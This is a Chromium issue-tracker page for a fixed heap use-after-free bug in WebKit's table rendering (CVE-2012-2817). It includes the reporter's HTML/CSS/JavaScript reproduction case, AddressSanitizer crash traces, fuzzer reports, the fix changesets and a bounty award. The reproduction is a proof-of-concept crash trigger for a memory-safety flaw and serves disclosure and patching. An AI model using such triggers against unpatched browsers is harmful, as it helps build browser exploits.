New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::RenderTableSection::paintCell
Reported by miau...@gmail.com, Mar 26 2012 Back to list
VULNERABILITY DETAILS
use-after-free in WebCore::RenderTableSection::paintCell

VERSION
Chrome Version: dev

Chromium	19.0.1081.0 (Developer Build 128813)
OS	Linux
WebKit	536.4 (@111994)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        counter-reset: c;
      }
      #el0::after {
        content: counter(c);
        counter-reset: c;
      }
      #el1::after {
        content: counter(c);
        counter-reset: c;
      }
      #el2 {
        counter-reset: c;
        height: 1px;
        width: 1px;
        -webkit-perspective: 1;
        overflow-x: scroll;
      }
      #el3 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0 = document.createElement('div')
        el0.setAttribute('id', 'el0')
        document.body.appendChild(el0)
        el1 = document.createElement('div')
        el1.setAttribute('id', 'el1')
        el0.appendChild(el1)
        el2 = document.createElement('div')
        el2.setAttribute('id', 'el2')
        el1.appendChild(el2)
        el3 = document.createElement('div')
        el3.setAttribute('id', 'el3')
        el2.appendChild(el3)
        el2.style.display='table-footer-group'
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==20036== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca77c98 at pc 0x55555ad20bb1 bp 0x7fffffff1b90 sp 0x7fffffff1b88
READ of size 8 at 0x7fffeca77c98 thread T0
    #0 0x55555ad20bb1 in WebCore::RenderTableSection::paintCell(WebCore::RenderTableCell*, WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0
    #1 0x55555ad220eb in WebCore::RenderTableSection::paintObject(WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0


0x7fffeca77c98 is located 24 bytes inside of 200-byte region [0x7fffeca77c80,0x7fffeca77d48)
freed by thread T0 here:
    #0 0x55555de96522 in free ??:0
    #1 0x5555592fd687 in WebCore::Node::detach() ???:0
    #2 0x5555592c16fd in WebCore::Element::detach() ???:0
    #3 0x5555592c2a37 in WebCore::Element::recalcStyle(WebCore::Node::StyleChange) ???:0



 
24200.html
1.1 KB View Download
24200.txt
10.4 KB View Download
Summary: Heap-use-after-free in WebCore::RenderTableSection::paintCell (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=30740098

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f179dff4a98
Crash State:
  - crash stack -
  WebCore::RenderTableSection::paintCell
  WebCore::RenderTableSection::paintObject
  - free stack -
  WebCore::Node::detach
  WebCore::Element::detach
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=122724:122726

Minimized Testcase (1.07 Kb): https://cluster-fuzz.appspot.com/download/AMIfv975slP6uk7xTBUQ7P9k-EBPkMrh9wX6CoZqTJXt8M0oEr1FBeQusK1hd9ok-sQgCH0YwZuM9Oy6e5fdDmszxE6uGj3MoPi7-s0jZwqBzMRVx7Lu-pju2-qllWcBpKtkOPTOQr3E4ZOdOu_8rh1ksahvsPYTKA
Cc: jchaffraix@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-None SecSeverity-High OS-All Mstone-19 Stability-AddressSanitizer
Status: Available
Comment 3 by laforge@google.com, Mar 27 2012
Labels: -Mstone-19 Mstone-20 MovedFrom-19
Labels: -MovedFrom-19 -Mstone-20 Mstone-19
Reverting the mass move. It does not apply to security bugs.
Mergedinto: 120944
Status: Duplicate
Lets stack these counter related layout bugs together. Unless we fix them, they will keep crashing in weird places.
Project Member Comment 6 by clusterf...@chromium.org, Apr 4 2012
ClusterFuzz has detected this issue as fixed in range 130617:130650.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=30740098

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f179dff4a98
Crash State:
  - crash stack -
  WebCore::RenderTableSection::paintCell
  WebCore::RenderTableSection::paintObject
  - free stack -
  WebCore::Node::detach
  WebCore::Element::detach
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=122724:122726
Fixed: https://cluster-fuzz.appspot.com/revisions?range=130617:130650

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv975slP6uk7xTBUQ7P9k-EBPkMrh9wX6CoZqTJXt8M0oEr1FBeQusK1hd9ok-sQgCH0YwZuM9Oy6e5fdDmszxE6uGj3MoPi7-s0jZwqBzMRVx7Lu-pju2-qllWcBpKtkOPTOQr3E4ZOdOu_8rh1ksahvsPYTKA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Mergedinto:
Status:
Cc: miau...@gmail.com
 Issue 129677  has been merged into this issue.
Comment 3 by inferno@chromium.org, Today (2 minutes ago)
It does seem to hit this anonymous table wrapper code path, 

    if (parentIsLeftOverAnonymousWrapper) {
        ASSERT(!parent->firstChild());
        parent->destroyAndCleanupAnonymousWrappers();
    }

from regression range, seems like coming from https://trac.webkit.org/changeset/108098/
Labels: reward-topanel
Presumably, the SecImpacts label is wrong now?
Labels: -SecImpacts-None SecImpacts-Stable SecImpacts-Beta
verified locally by commenting out the lines, so it does seem to regress from https://trac.webkit.org/changeset/108098/
Cc: le...@chromium.org
Comment 15 by kenrb@chromium.org, May 25 2012
Owner: infe...@chromium.org
Status: Started
Comment 16 by kenrb@google.com, May 26 2012
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118592
Labels: -Mstone-19 -Merge-Approved Mstone-20 Merge-Merged
M20: http://trac.webkit.org/changeset/118867
Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: time to catch up on rewards ;-)
You may see a flood of activity and prosperity :)
 Issue 129677  has been merged into this issue.
Labels: CVE-2012-2817
Labels: -reward-unpaid
Thanks miaubiz. Payment for this one is going out with a bunch of others as part of a $10k batch :D
Project Member Comment 23 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member Comment 25 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecSeverity-High -Stability-AddressSanitizer -Mstone-20 -SecImpacts-Beta Cr-Content Security-Impact-Stable Security-Impact-Beta M-20 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 26 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 14 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 30 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 31 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 32 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 33 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 34 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 35 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 36 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment